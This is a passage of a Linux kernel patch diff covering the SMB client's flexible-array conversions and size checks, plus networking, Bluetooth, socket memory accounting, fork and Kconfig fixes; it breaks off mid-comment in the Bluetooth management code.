+@@ -718,7 +718,7 @@ typedef struct smb_com_tconx_rsp_ext {
+ 	__le32 MaximalShareAccessRights;
+ 	__le32 GuestMaximalShareAccessRights;
+ 	__u16 ByteCount;
+-	unsigned char Service[1];	/* always ASCII, not Unicode */
++	unsigned char Service[];	/* always ASCII, not Unicode */
+ 	/* STRING NativeFileSystem */
+ } __attribute__((packed)) TCONX_RSP_EXT;
+ 
+@@ -755,14 +755,14 @@ typedef struct smb_com_echo_req {
+ 	struct	smb_hdr hdr;
+ 	__le16	EchoCount;
+ 	__le16	ByteCount;
+-	char	Data[1];
++	char	Data[];
+ } __attribute__((packed)) ECHO_REQ;
+ 
+ typedef struct smb_com_echo_rsp {
+ 	struct	smb_hdr hdr;
+ 	__le16	SequenceNumber;
+ 	__le16	ByteCount;
+-	char	Data[1];
++	char	Data[];
+ } __attribute__((packed)) ECHO_RSP;
+ 
+ typedef struct smb_com_logoff_andx_req {
+@@ -862,7 +862,7 @@ typedef struct smb_com_open_req {	/* also handles create */
+ 	__le32 ImpersonationLevel;
+ 	__u8 SecurityFlags;
+ 	__le16 ByteCount;
+-	char fileName[1];
++	char fileName[];
+ } __attribute__((packed)) OPEN_REQ;
+ 
+ /* open response: oplock levels */
+@@ -882,7 +882,7 @@ typedef struct smb_com_open_rsp {
+ 	__u8 OplockLevel;
+ 	__u16 Fid;
+ 	__le32 CreateAction;
+-	struct_group(common_attributes,
++	struct_group_attr(common_attributes, __packed,
+ 		__le64 CreationTime;
+ 		__le64 LastAccessTime;
+ 		__le64 LastWriteTime;
+@@ -939,7 +939,7 @@ typedef struct smb_com_openx_req {
+ 	__le32 Timeout;
+ 	__le32 Reserved;
+ 	__le16  ByteCount;  /* file name follows */
+-	char   fileName[1];
++	char   fileName[];
+ } __attribute__((packed)) OPENX_REQ;
+ 
+ typedef struct smb_com_openx_rsp {
+@@ -1087,7 +1087,7 @@ typedef struct smb_com_lock_req {
+ 	__le16 NumberOfUnlocks;
+ 	__le16 NumberOfLocks;
+ 	__le16 ByteCount;
+-	LOCKING_ANDX_RANGE Locks[1];
++	LOCKING_ANDX_RANGE Locks[];
+ } __attribute__((packed)) LOCK_REQ;
+ 
+ /* lock type */
+@@ -1116,7 +1116,7 @@ typedef struct smb_com_rename_req {
+ 	__le16 SearchAttributes;	/* target file attributes */
+ 	__le16 ByteCount;
+ 	__u8 BufferFormat;	/* 4 = ASCII or Unicode */
+-	unsigned char OldFileName[1];
++	unsigned char OldFileName[];
+ 	/* followed by __u8 BufferFormat2 */
+ 	/* followed by NewFileName */
+ } __attribute__((packed)) RENAME_REQ;
+@@ -1136,7 +1136,7 @@ typedef struct smb_com_copy_req {
+ 	__le16 Flags;
+ 	__le16 ByteCount;
+ 	__u8 BufferFormat;	/* 4 = ASCII or Unicode */
+-	unsigned char OldFileName[1];
++	unsigned char OldFileName[];
+ 	/* followed by __u8 BufferFormat2 */
+ 	/* followed by NewFileName string */
+ } __attribute__((packed)) COPY_REQ;
+@@ -1146,7 +1146,7 @@ typedef struct smb_com_copy_rsp {
+ 	__le16 CopyCount;    /* number of files copied */
+ 	__u16 ByteCount;    /* may be zero */
+ 	__u8 BufferFormat;  /* 0x04 - only present if errored file follows */
+-	unsigned char ErrorFileName[1]; /* only present if error in copy */
++	unsigned char ErrorFileName[]; /* only present if error in copy */
+ } __attribute__((packed)) COPY_RSP;
+ 
+ #define CREATE_HARD_LINK		0x103
+@@ -1160,7 +1160,7 @@ typedef struct smb_com_nt_rename_req {	/* A5 - also used for create hardlink */
+ 	__le32 ClusterCount;
+ 	__le16 ByteCount;
+ 	__u8 BufferFormat;	/* 4 = ASCII or Unicode */
+-	unsigned char OldFileName[1];
++	unsigned char OldFileName[];
+ 	/* followed by __u8 BufferFormat2 */
+ 	/* followed by NewFileName */
+ } __attribute__((packed)) NT_RENAME_REQ;
+@@ -1175,7 +1175,7 @@ typedef struct smb_com_delete_file_req {
+ 	__le16 SearchAttributes;
+ 	__le16 ByteCount;
+ 	__u8 BufferFormat;	/* 4 = ASCII */
+-	unsigned char fileName[1];
++	unsigned char fileName[];
+ } __attribute__((packed)) DELETE_FILE_REQ;
+ 
+ typedef struct smb_com_delete_file_rsp {
+@@ -1187,7 +1187,7 @@ typedef struct smb_com_delete_directory_req {
+ 	struct smb_hdr hdr;	/* wct = 0 */
+ 	__le16 ByteCount;
+ 	__u8 BufferFormat;	/* 4 = ASCII */
+-	unsigned char DirName[1];
++	unsigned char DirName[];
+ } __attribute__((packed)) DELETE_DIRECTORY_REQ;
+ 
+ typedef struct smb_com_delete_directory_rsp {
+@@ -1199,7 +1199,7 @@ typedef struct smb_com_create_directory_req {
+ 	struct smb_hdr hdr;	/* wct = 0 */
+ 	__le16 ByteCount;
+ 	__u8 BufferFormat;	/* 4 = ASCII */
+-	unsigned char DirName[1];
++	unsigned char DirName[];
+ } __attribute__((packed)) CREATE_DIRECTORY_REQ;
+ 
+ typedef struct smb_com_create_directory_rsp {
+@@ -1211,7 +1211,7 @@ typedef struct smb_com_query_information_req {
+ 	struct smb_hdr hdr;     /* wct = 0 */
+ 	__le16 ByteCount;	/* 1 + namelen + 1 */
+ 	__u8 BufferFormat;      /* 4 = ASCII */
+-	unsigned char FileName[1];
++	unsigned char FileName[];
+ } __attribute__((packed)) QUERY_INFORMATION_REQ;
+ 
+ typedef struct smb_com_query_information_rsp {
+@@ -1231,7 +1231,7 @@ typedef struct smb_com_setattr_req {
+ 	__le16 reserved[5]; /* must be zero */
+ 	__u16  ByteCount;
+ 	__u8   BufferFormat; /* 4 = ASCII */
+-	unsigned char fileName[1];
++	unsigned char fileName[];
+ } __attribute__((packed)) SETATTR_REQ;
+ 
+ typedef struct smb_com_setattr_rsp {
+@@ -1313,7 +1313,7 @@ typedef struct smb_com_transaction_ioctl_req {
+ 	__u8 IsRootFlag; /* 1 = apply command to root of share (must be DFS) */
+ 	__le16 ByteCount;
+ 	__u8 Pad[3];
+-	__u8 Data[1];
++	__u8 Data[];
+ } __attribute__((packed)) TRANSACT_IOCTL_REQ;
+ 
+ typedef struct smb_com_transaction_compr_ioctl_req {
+@@ -1431,8 +1431,8 @@ typedef struct smb_com_transaction_change_notify_req {
+ 	__u8 WatchTree;  /* 1 = Monitor subdirectories */
+ 	__u8 Reserved2;
+ 	__le16 ByteCount;
+-/* 	__u8 Pad[3];*/
+-/*	__u8 Data[1];*/
++/*	__u8 Pad[3];*/
++/*	__u8 Data[];*/
+ } __attribute__((packed)) TRANSACT_CHANGE_NOTIFY_REQ;
+ 
+ /* BB eventually change to use generic ntransact rsp struct
+@@ -1521,7 +1521,7 @@ struct cifs_quota_data {
+ 	__u64	space_used;
+ 	__u64	soft_limit;
+ 	__u64	hard_limit;
+-	char	sid[1];  /* variable size? */
++	char	sid[];  /* variable size? */
+ } __attribute__((packed));
+ 
+ /* quota sub commands */
+@@ -1673,7 +1673,7 @@ typedef struct smb_com_transaction2_qpi_req {
+ 	__u8 Pad;
+ 	__le16 InformationLevel;
+ 	__u32 Reserved4;
+-	char FileName[1];
++	char FileName[];
+ } __attribute__((packed)) TRANSACTION2_QPI_REQ;
+ 
+ typedef struct smb_com_transaction2_qpi_rsp {
+@@ -1706,7 +1706,7 @@ typedef struct smb_com_transaction2_spi_req {
+ 	__u16 Pad1;
+ 	__le16 InformationLevel;
+ 	__u32 Reserved4;
+-	char FileName[1];
++	char FileName[];
+ } __attribute__((packed)) TRANSACTION2_SPI_REQ;
+ 
+ typedef struct smb_com_transaction2_spi_rsp {
+@@ -1813,7 +1813,7 @@ typedef struct smb_com_transaction2_ffirst_req {
+ 	__le16 SearchFlags;
+ 	__le16 InformationLevel;
+ 	__le32 SearchStorageType;
+-	char FileName[1];
++	char FileName[];
+ } __attribute__((packed)) TRANSACTION2_FFIRST_REQ;
+ 
+ typedef struct smb_com_transaction2_ffirst_rsp {
+@@ -2024,7 +2024,7 @@ typedef struct smb_com_transaction2_get_dfs_refer_req {
+ 				   perhaps?) followed by one byte pad - doesn't
+ 				   seem to matter though */
+ 	__le16 MaxReferralLevel;
+-	char RequestFileName[1];
++	char RequestFileName[];
+ } __attribute__((packed)) TRANSACTION2_GET_DFS_REFER_REQ;
+ 
+ #define DFS_VERSION cpu_to_le16(0x0003)
+@@ -2053,7 +2053,7 @@ struct get_dfs_referral_rsp {
+ 	__le16 PathConsumed;
+ 	__le16 NumberOfReferrals;
+ 	__le32 DFSFlags;
+-	REFERRAL3 referrals[1];	/* array of level 3 dfs_referral structures */
++	REFERRAL3 referrals[];	/* array of level 3 dfs_referral structures */
+ 	/* followed by the strings pointed to by the referral structures */
+ } __packed;
+ 
+@@ -2270,7 +2270,7 @@ typedef struct {
+ /* QueryFileInfo/QueryPathinfo (also for SetPath/SetFile) data buffer formats */
+ /******************************************************************************/
+ typedef struct { /* data block encoding of response to level 263 QPathInfo */
+-	struct_group(common_attributes,
++	struct_group_attr(common_attributes, __packed,
+ 		__le64 CreationTime;
+ 		__le64 LastAccessTime;
+ 		__le64 LastWriteTime;
+@@ -2292,7 +2292,10 @@ typedef struct { /* data block encoding of response to level 263 QPathInfo */
+ 	__le32 Mode;
+ 	__le32 AlignmentRequirement;
+ 	__le32 FileNameLength;
+-	char FileName[1];
++	union {
++		char __pad;
++		DECLARE_FLEX_ARRAY(char, FileName);
++	};
+ } __attribute__((packed)) FILE_ALL_INFO;	/* level 0x107 QPathInfo */
+ 
+ typedef struct {
+@@ -2330,7 +2333,7 @@ typedef struct {
+ } __attribute__((packed)) FILE_UNIX_BASIC_INFO;	/* level 0x200 QPathInfo */
+ 
+ typedef struct {
+-	char LinkDest[1];
++	DECLARE_FLEX_ARRAY(char, LinkDest);
+ } __attribute__((packed)) FILE_UNIX_LINK_INFO;	/* level 0x201 QPathInfo */
+ 
+ /* The following three structures are needed only for
+@@ -2380,7 +2383,7 @@ struct file_end_of_file_info {
+ } __attribute__((packed)); /* size info, level 0x104 for set, 0x106 for query */
+ 
+ struct file_alt_name_info {
+-	__u8   alt_name[1];
++	DECLARE_FLEX_ARRAY(__u8, alt_name);
+ } __attribute__((packed));      /* level 0x0108 */
+ 
+ struct file_stream_info {
+@@ -2490,7 +2493,10 @@ typedef struct {
+ 	__le32 NextEntryOffset;
+ 	__u32 ResumeKey; /* as with FileIndex - no need to convert */
+ 	FILE_UNIX_BASIC_INFO basic;
+-	char FileName[1];
++	union {
++		char __pad;
++		DECLARE_FLEX_ARRAY(char, FileName);
++	};
+ } __attribute__((packed)) FILE_UNIX_INFO; /* level 0x202 */
+ 
+ typedef struct {
+@@ -2504,7 +2510,7 @@ typedef struct {
+ 	__le64 AllocationSize;
+ 	__le32 ExtFileAttributes;
+ 	__le32 FileNameLength;
+-	char FileName[1];
++	char FileName[];
+ } __attribute__((packed)) FILE_DIRECTORY_INFO;   /* level 0x101 FF resp data */
+ 
+ typedef struct {
+@@ -2519,7 +2525,7 @@ typedef struct {
+ 	__le32 ExtFileAttributes;
+ 	__le32 FileNameLength;
+ 	__le32 EaSize; /* length of the xattrs */
+-	char FileName[1];
++	char FileName[];
+ } __attribute__((packed)) FILE_FULL_DIRECTORY_INFO; /* level 0x102 rsp data */
+ 
+ typedef struct {
+@@ -2536,7 +2542,7 @@ typedef struct {
+ 	__le32 EaSize; /* EA size */
+ 	__le32 Reserved;
+ 	__le64 UniqueId; /* inode num - le since Samba puts ino in low 32 bit*/
+-	char FileName[1];
++	char FileName[];
+ } __attribute__((packed)) SEARCH_ID_FULL_DIR_INFO; /* level 0x105 FF rsp data */
+ 
+ typedef struct {
+@@ -2554,7 +2560,7 @@ typedef struct {
+ 	__u8   ShortNameLength;
+ 	__u8   Reserved;
+ 	__u8   ShortName[24];
+-	char FileName[1];
++	char FileName[];
+ } __attribute__((packed)) FILE_BOTH_DIRECTORY_INFO; /* level 0x104 FFrsp data */
+ 
+ typedef struct {
+@@ -2569,7 +2575,7 @@ typedef struct {
+ 	__le32 AllocationSize;
+ 	__le16 Attributes; /* verify not u32 */
+ 	__u8   FileNameLength;
+-	char FileName[1];
++	char FileName[];
+ } __attribute__((packed)) FIND_FILE_STANDARD_INFO; /* level 0x1 FF resp data */
+ 
+ 
+@@ -2579,16 +2585,6 @@ struct win_dev {
+ 	__le64 minor;
+ } __attribute__((packed));
+ 
+-struct gea {
+-	unsigned char name_len;
+-	char name[1];
+-} __attribute__((packed));
+-
+-struct gealist {
+-	unsigned long list_len;
+-	struct gea list[1];
+-} __attribute__((packed));
+-
+ struct fea {
+ 	unsigned char EA_flags;
+ 	__u8 name_len;
+diff --git a/fs/smb/client/fs_context.c b/fs/smb/client/fs_context.c
+index 4d5302b58b534..ca39d01077cdf 100644
+--- a/fs/smb/client/fs_context.c
++++ b/fs/smb/client/fs_context.c
+@@ -676,6 +676,16 @@ static int smb3_fs_context_validate(struct fs_context *fc)
+ 	/* set the port that we got earlier */
+ 	cifs_set_port((struct sockaddr *)&ctx->dstaddr, ctx->port);
+ 
++	if (ctx->uid_specified && !ctx->forceuid_specified) {
++		ctx->override_uid = 1;
++		pr_notice("enabling forceuid mount option implicitly because uid= option is specified\n");
++	}
++
++	if (ctx->gid_specified && !ctx->forcegid_specified) {
++		ctx->override_gid = 1;
++		pr_notice("enabling forcegid mount option implicitly because gid= option is specified\n");
++	}
++
+ 	if (ctx->override_uid && !ctx->uid_specified) {
+ 		ctx->override_uid = 0;
+ 		pr_notice("ignoring forceuid mount option specified with no uid= option\n");
+@@ -923,12 +933,14 @@ static int smb3_fs_context_parse_param(struct fs_context *fc,
+ 			ctx->override_uid = 0;
+ 		else
+ 			ctx->override_uid = 1;
++		ctx->forceuid_specified = true;
+ 		break;
+ 	case Opt_forcegid:
+ 		if (result.negated)
+ 			ctx->override_gid = 0;
+ 		else
+ 			ctx->override_gid = 1;
++		ctx->forcegid_specified = true;
+ 		break;
+ 	case Opt_perm:
+ 		if (result.negated)
+diff --git a/fs/smb/client/fs_context.h b/fs/smb/client/fs_context.h
+index 26093f54d3e65..319a91b7f6700 100644
+--- a/fs/smb/client/fs_context.h
++++ b/fs/smb/client/fs_context.h
+@@ -154,6 +154,8 @@ enum cifs_param {
+ };
+ 
+ struct smb3_fs_context {
++	bool forceuid_specified;
++	bool forcegid_specified;
+ 	bool uid_specified;
+ 	bool cruid_specified;
+ 	bool gid_specified;
+diff --git a/fs/smb/client/readdir.c b/fs/smb/client/readdir.c
+index 5990bdbae598f..9a1f1913fb592 100644
+--- a/fs/smb/client/readdir.c
++++ b/fs/smb/client/readdir.c
+@@ -497,7 +497,7 @@ static char *nxt_dir_entry(char *old_entry, char *end_of_smb, int level)
+ 		FIND_FILE_STANDARD_INFO *pfData;
+ 		pfData = (FIND_FILE_STANDARD_INFO *)pDirInfo;
+ 
+-		new_entry = old_entry + sizeof(FIND_FILE_STANDARD_INFO) +
++		new_entry = old_entry + sizeof(FIND_FILE_STANDARD_INFO) + 1 +
+ 				pfData->FileNameLength;
+ 	} else {
+ 		u32 next_offset = le32_to_cpu(pDirInfo->NextEntryOffset);
+@@ -515,9 +515,9 @@ static char *nxt_dir_entry(char *old_entry, char *end_of_smb, int level)
+ 			 new_entry, end_of_smb, old_entry);
+ 		return NULL;
+ 	} else if (((level == SMB_FIND_FILE_INFO_STANDARD) &&
+-		    (new_entry + sizeof(FIND_FILE_STANDARD_INFO) > end_of_smb))
++		    (new_entry + sizeof(FIND_FILE_STANDARD_INFO) + 1 > end_of_smb))
+ 		  || ((level != SMB_FIND_FILE_INFO_STANDARD) &&
+-		   (new_entry + sizeof(FILE_DIRECTORY_INFO) > end_of_smb)))  {
++		   (new_entry + sizeof(FILE_DIRECTORY_INFO) + 1 > end_of_smb)))  {
+ 		cifs_dbg(VFS, "search entry %p extends after end of SMB %p\n",
+ 			 new_entry, end_of_smb);
+ 		return NULL;
+diff --git a/fs/smb/client/smb2pdu.c b/fs/smb/client/smb2pdu.c
+index cc425a616899a..e15bf116c7558 100644
+--- a/fs/smb/client/smb2pdu.c
++++ b/fs/smb/client/smb2pdu.c
+@@ -5073,10 +5073,10 @@ smb2_parse_query_directory(struct cifs_tcon *tcon,
+ 
+ 	switch (srch_inf->info_level) {
+ 	case SMB_FIND_FILE_DIRECTORY_INFO:
+-		info_buf_size = sizeof(FILE_DIRECTORY_INFO) - 1;
++		info_buf_size = sizeof(FILE_DIRECTORY_INFO);
+ 		break;
+ 	case SMB_FIND_FILE_ID_FULL_DIR_INFO:
+-		info_buf_size = sizeof(SEARCH_ID_FULL_DIR_INFO) - 1;
++		info_buf_size = sizeof(SEARCH_ID_FULL_DIR_INFO);
+ 		break;
+ 	case SMB_FIND_FILE_POSIX_INFO:
+ 		/* note that posix payload are variable size */
+diff --git a/fs/smb/client/smb2pdu.h b/fs/smb/client/smb2pdu.h
+index 8d011fedecd03..2823526b66f7e 100644
+--- a/fs/smb/client/smb2pdu.h
++++ b/fs/smb/client/smb2pdu.h
+@@ -339,7 +339,7 @@ struct smb2_file_reparse_point_info {
+ } __packed;
+ 
+ struct smb2_file_network_open_info {
+-	struct_group(network_open_info,
++	struct_group_attr(network_open_info, __packed,
+ 		__le64 CreationTime;
+ 		__le64 LastAccessTime;
+ 		__le64 LastWriteTime;
+@@ -373,7 +373,7 @@ struct smb2_file_id_extd_directory_info {
+ 	__le32 EaSize; /* EA size */
+ 	__le32 ReparsePointTag; /* valid if FILE_ATTR_REPARSE_POINT set in FileAttributes */
+ 	__le64 UniqueId; /* inode num - le since Samba puts ino in low 32 bit */
+-	char FileName[1];
++	char FileName[];
+ } __packed; /* level 60 */
+ 
+ extern char smb2_padding[7];
+diff --git a/fs/smb/client/transport.c b/fs/smb/client/transport.c
+index df44acaec9ae9..338b34c99b2de 100644
+--- a/fs/smb/client/transport.c
++++ b/fs/smb/client/transport.c
+@@ -931,12 +931,15 @@ cifs_sync_mid_result(struct mid_q_entry *mid, struct TCP_Server_Info *server)
+ 			list_del_init(&mid->qhead);
+ 			mid->mid_flags |= MID_DELETED;
+ 		}
++		spin_unlock(&server->mid_lock);
+ 		cifs_server_dbg(VFS, "%s: invalid mid state mid=%llu state=%d\n",
+ 			 __func__, mid->mid, mid->mid_state);
+ 		rc = -EIO;
++		goto sync_mid_done;
+ 	}
+ 	spin_unlock(&server->mid_lock);
+ 
++sync_mid_done:
+ 	release_mid(mid);
+ 	return rc;
+ }
+diff --git a/include/linux/etherdevice.h b/include/linux/etherdevice.h
+index a541f0c4f146c..d7eef2158667d 100644
+--- a/include/linux/etherdevice.h
++++ b/include/linux/etherdevice.h
+@@ -593,6 +593,31 @@ static inline void eth_hw_addr_gen(struct net_device *dev, const u8 *base_addr,
+ 	eth_hw_addr_set(dev, addr);
+ }
+ 
++/**
++ * eth_skb_pkt_type - Assign packet type if destination address does not match
++ * @skb: Assigned a packet type if address does not match @dev address
++ * @dev: Network device used to compare packet address against
++ *
++ * If the destination MAC address of the packet does not match the network
++ * device address, assign an appropriate packet type.
++ */
++static inline void eth_skb_pkt_type(struct sk_buff *skb,
++				    const struct net_device *dev)
++{
++	const struct ethhdr *eth = eth_hdr(skb);
++
++	if (unlikely(!ether_addr_equal_64bits(eth->h_dest, dev->dev_addr))) {
++		if (unlikely(is_multicast_ether_addr_64bits(eth->h_dest))) {
++			if (ether_addr_equal_64bits(eth->h_dest, dev->broadcast))
++				skb->pkt_type = PACKET_BROADCAST;
++			else
++				skb->pkt_type = PACKET_MULTICAST;
++		} else {
++			skb->pkt_type = PACKET_OTHERHOST;
++		}
++	}
++}
++
+ /**
+  * eth_skb_pad - Pad buffer to mininum number of octets for Ethernet frame
+  * @skb: Buffer to pad
+diff --git a/include/net/af_unix.h b/include/net/af_unix.h
+index 16d6936baa2fb..e7d71a516bd4d 100644
+--- a/include/net/af_unix.h
++++ b/include/net/af_unix.h
+@@ -79,6 +79,9 @@ enum unix_socket_lock_class {
+ 	U_LOCK_NORMAL,
+ 	U_LOCK_SECOND,	/* for double locking, see unix_state_double_lock(). */
+ 	U_LOCK_DIAG, /* used while dumping icons, see sk_diag_dump_icons(). */
++	U_LOCK_GC_LISTENER, /* used for listening socket while determining gc
++			     * candidates to close a small race window.
++			     */
+ };
+ 
+ static inline void unix_state_lock_nested(struct sock *sk,
+diff --git a/include/net/macsec.h b/include/net/macsec.h
+index 65c93959c2dc5..dd578d193f9aa 100644
+--- a/include/net/macsec.h
++++ b/include/net/macsec.h
+@@ -302,6 +302,7 @@ struct macsec_ops {
+ 	int (*mdo_get_tx_sa_stats)(struct macsec_context *ctx);
+ 	int (*mdo_get_rx_sc_stats)(struct macsec_context *ctx);
+ 	int (*mdo_get_rx_sa_stats)(struct macsec_context *ctx);
++	bool rx_uses_md_dst;
+ };
+ 
+ void macsec_pn_wrapped(struct macsec_secy *secy, struct macsec_tx_sa *tx_sa);
+diff --git a/include/net/sock.h b/include/net/sock.h
+index 60577751ea9e8..77298c74822a6 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -1483,33 +1483,36 @@ sk_memory_allocated(const struct sock *sk)
+ 
+ /* 1 MB per cpu, in page units */
+ #define SK_MEMORY_PCPU_RESERVE (1 << (20 - PAGE_SHIFT))
++extern int sysctl_mem_pcpu_rsv;
++
++static inline void proto_memory_pcpu_drain(struct proto *proto)
++{
++	int val = this_cpu_xchg(*proto->per_cpu_fw_alloc, 0);
++
++	if (val)
++		atomic_long_add(val, proto->memory_allocated);
++}
+ 
+ static inline void
+-sk_memory_allocated_add(struct sock *sk, int amt)
++sk_memory_allocated_add(const struct sock *sk, int val)
+ {
+-	int local_reserve;
++	struct proto *proto = sk->sk_prot;
+ 
+-	preempt_disable();
+-	local_reserve = __this_cpu_add_return(*sk->sk_prot->per_cpu_fw_alloc, amt);
+-	if (local_reserve >= SK_MEMORY_PCPU_RESERVE) {
+-		__this_cpu_sub(*sk->sk_prot->per_cpu_fw_alloc, local_reserve);
+-		atomic_long_add(local_reserve, sk->sk_prot->memory_allocated);
+-	}
+-	preempt_enable();
++	val = this_cpu_add_return(*proto->per_cpu_fw_alloc, val);
++
++	if (unlikely(val >= READ_ONCE(sysctl_mem_pcpu_rsv)))
++		proto_memory_pcpu_drain(proto);
+ }
+ 
+ static inline void
+-sk_memory_allocated_sub(struct sock *sk, int amt)
++sk_memory_allocated_sub(const struct sock *sk, int val)
+ {
+-	int local_reserve;
++	struct proto *proto = sk->sk_prot;
+ 
+-	preempt_disable();
+-	local_reserve = __this_cpu_sub_return(*sk->sk_prot->per_cpu_fw_alloc, amt);
+-	if (local_reserve <= -SK_MEMORY_PCPU_RESERVE) {
+-		__this_cpu_sub(*sk->sk_prot->per_cpu_fw_alloc, local_reserve);
+-		atomic_long_add(local_reserve, sk->sk_prot->memory_allocated);
+-	}
+-	preempt_enable();
++	val = this_cpu_sub_return(*proto->per_cpu_fw_alloc, val);
++
++	if (unlikely(val <= -READ_ONCE(sysctl_mem_pcpu_rsv)))
++		proto_memory_pcpu_drain(proto);
+ }
+ 
+ #define SK_ALLOC_PERCPU_COUNTER_BATCH 16
+diff --git a/init/Kconfig b/init/Kconfig
+index b63dce6706c5c..537f01eba2e6f 100644
+--- a/init/Kconfig
++++ b/init/Kconfig
+@@ -1920,11 +1920,11 @@ config RUST
+ 	bool "Rust support"
+ 	depends on HAVE_RUST
+ 	depends on RUST_IS_AVAILABLE
++	depends on !CFI_CLANG
+ 	depends on !MODVERSIONS
+ 	depends on !GCC_PLUGINS
+ 	depends on !RANDSTRUCT
+ 	depends on !DEBUG_INFO_BTF || PAHOLE_HAS_LANG_EXCLUDE
+-	select CONSTRUCTORS
+ 	help
+ 	  Enables Rust support in the kernel.
+ 
+diff --git a/kernel/bounds.c b/kernel/bounds.c
+index c5a9fcd2d6228..29b2cd00df2cc 100644
+--- a/kernel/bounds.c
++++ b/kernel/bounds.c
+@@ -19,7 +19,7 @@ int main(void)
+ 	DEFINE(NR_PAGEFLAGS, __NR_PAGEFLAGS);
+ 	DEFINE(MAX_NR_ZONES, __MAX_NR_ZONES);
+ #ifdef CONFIG_SMP
+-	DEFINE(NR_CPUS_BITS, bits_per(CONFIG_NR_CPUS));
++	DEFINE(NR_CPUS_BITS, order_base_2(CONFIG_NR_CPUS));
+ #endif
+ 	DEFINE(SPINLOCK_SIZE, sizeof(spinlock_t));
+ #ifdef CONFIG_LRU_GEN
+diff --git a/kernel/cpu.c b/kernel/cpu.c
+index 2c44dd12a158c..e0e09b700b430 100644
+--- a/kernel/cpu.c
++++ b/kernel/cpu.c
+@@ -2788,8 +2788,8 @@ enum cpu_mitigations {
+ };
+ 
+ static enum cpu_mitigations cpu_mitigations __ro_after_init =
+-	IS_ENABLED(CONFIG_SPECULATION_MITIGATIONS) ? CPU_MITIGATIONS_AUTO :
+-						     CPU_MITIGATIONS_OFF;
++	IS_ENABLED(CONFIG_CPU_MITIGATIONS) ? CPU_MITIGATIONS_AUTO :
++					     CPU_MITIGATIONS_OFF;
+ 
+ static int __init mitigations_parse_cmdline(char *arg)
+ {
+diff --git a/kernel/fork.c b/kernel/fork.c
+index 85617928041cf..7e9a5919299b4 100644
+--- a/kernel/fork.c
++++ b/kernel/fork.c
+@@ -662,6 +662,15 @@ static __latent_entropy int dup_mmap(struct mm_struct *mm,
+ 		} else if (anon_vma_fork(tmp, mpnt))
+ 			goto fail_nomem_anon_vma_fork;
+ 		tmp->vm_flags &= ~(VM_LOCKED | VM_LOCKONFAULT);
++		/*
++		 * Copy/update hugetlb private vma information.
++		 */
++		if (is_vm_hugetlb_page(tmp))
++			hugetlb_dup_vma_private(tmp);
++
++		if (tmp->vm_ops && tmp->vm_ops->open)
++			tmp->vm_ops->open(tmp);
++
+ 		file = tmp->vm_file;
+ 		if (file) {
+ 			struct address_space *mapping = file->f_mapping;
+@@ -678,12 +687,6 @@ static __latent_entropy int dup_mmap(struct mm_struct *mm,
+ 			i_mmap_unlock_write(mapping);
+ 		}
+ 
+-		/*
+-		 * Copy/update hugetlb private vma information.
+-		 */
+-		if (is_vm_hugetlb_page(tmp))
+-			hugetlb_dup_vma_private(tmp);
+-
+ 		/* Link the vma into the MT */
+ 		mas.index = tmp->vm_start;
+ 		mas.last = tmp->vm_end - 1;
+@@ -695,9 +698,6 @@ static __latent_entropy int dup_mmap(struct mm_struct *mm,
+ 		if (!(tmp->vm_flags & VM_WIPEONFORK))
+ 			retval = copy_page_range(tmp, mpnt);
+ 
+-		if (tmp->vm_ops && tmp->vm_ops->open)
+-			tmp->vm_ops->open(tmp);
+-
+ 		if (retval)
+ 			goto loop_out;
+ 	}
+diff --git a/lib/stackdepot.c b/lib/stackdepot.c
+index 79e894cf84064..77eb944b7a6bd 100644
+--- a/lib/stackdepot.c
++++ b/lib/stackdepot.c
+@@ -466,10 +466,10 @@ depot_stack_handle_t __stack_depot_save(unsigned long *entries,
+ 		/*
+ 		 * Zero out zone modifiers, as we don't have specific zone
+ 		 * requirements. Keep the flags related to allocation in atomic
+-		 * contexts and I/O.
++		 * contexts, I/O, nolockdep.
+ 		 */
+ 		alloc_flags &= ~GFP_ZONEMASK;
+-		alloc_flags &= (GFP_ATOMIC | GFP_KERNEL);
++		alloc_flags &= (GFP_ATOMIC | GFP_KERNEL | __GFP_NOLOCKDEP);
+ 		alloc_flags |= __GFP_NOWARN;
+ 		page = alloc_pages(alloc_flags, STACK_ALLOC_ORDER);
+ 		if (page)
+diff --git a/net/ax25/af_ax25.c b/net/ax25/af_ax25.c
+index 6b4c25a923774..0bffac238b615 100644
+--- a/net/ax25/af_ax25.c
++++ b/net/ax25/af_ax25.c
+@@ -103,7 +103,7 @@ static void ax25_kill_by_device(struct net_device *dev)
+ 			s->ax25_dev = NULL;
+ 			if (sk->sk_socket) {
+ 				netdev_put(ax25_dev->dev,
+-					   &ax25_dev->dev_tracker);
++					   &s->dev_tracker);
+ 				ax25_dev_put(ax25_dev);
+ 			}
+ 			ax25_cb_del(s);
+diff --git a/net/bluetooth/l2cap_sock.c b/net/bluetooth/l2cap_sock.c
+index 4198ca66fbe10..e3c7029ec8a61 100644
+--- a/net/bluetooth/l2cap_sock.c
++++ b/net/bluetooth/l2cap_sock.c
+@@ -457,7 +457,8 @@ static int l2cap_sock_getsockopt_old(struct socket *sock, int optname,
+ 	struct l2cap_chan *chan = l2cap_pi(sk)->chan;
+ 	struct l2cap_options opts;
+ 	struct l2cap_conninfo cinfo;
+-	int len, err = 0;
++	int err = 0;
++	size_t len;
+ 	u32 opt;
+ 
+ 	BT_DBG("sk %p", sk);
+@@ -504,7 +505,7 @@ static int l2cap_sock_getsockopt_old(struct socket *sock, int optname,
+ 
+ 		BT_DBG("mode 0x%2.2x", chan->mode);
+ 
+-		len = min_t(unsigned int, len, sizeof(opts));
++		len = min(len, sizeof(opts));
+ 		if (copy_to_user(optval, (char *) &opts, len))
+ 			err = -EFAULT;
+ 
+@@ -554,7 +555,7 @@ static int l2cap_sock_getsockopt_old(struct socket *sock, int optname,
+ 		cinfo.hci_handle = chan->conn->hcon->handle;
+ 		memcpy(cinfo.dev_class, chan->conn->hcon->dev_class, 3);
+ 
+-		len = min_t(unsigned int, len, sizeof(cinfo));
++		len = min(len, sizeof(cinfo));
+ 		if (copy_to_user(optval, (char *) &cinfo, len))
+ 			err = -EFAULT;
+ 
+diff --git a/net/bluetooth/mgmt.c b/net/bluetooth/mgmt.c
+index 716f6dc4934b7..76dac5a90aef0 100644
+--- a/net/bluetooth/mgmt.c
++++ b/net/bluetooth/mgmt.c
+@@ -2680,7 +2680,11 @@ static int add_uuid(struct sock *sk, struct hci_dev *hdev, void *data, u16 len)
+ 		goto failed;
+ 	}
+ 
+-	err = hci_cmd_sync_queue(hdev, add_uuid_sync, cmd, mgmt_class_complete);
++	/* MGMT_OP_ADD_UUID don't require adapter the UP/Running so use
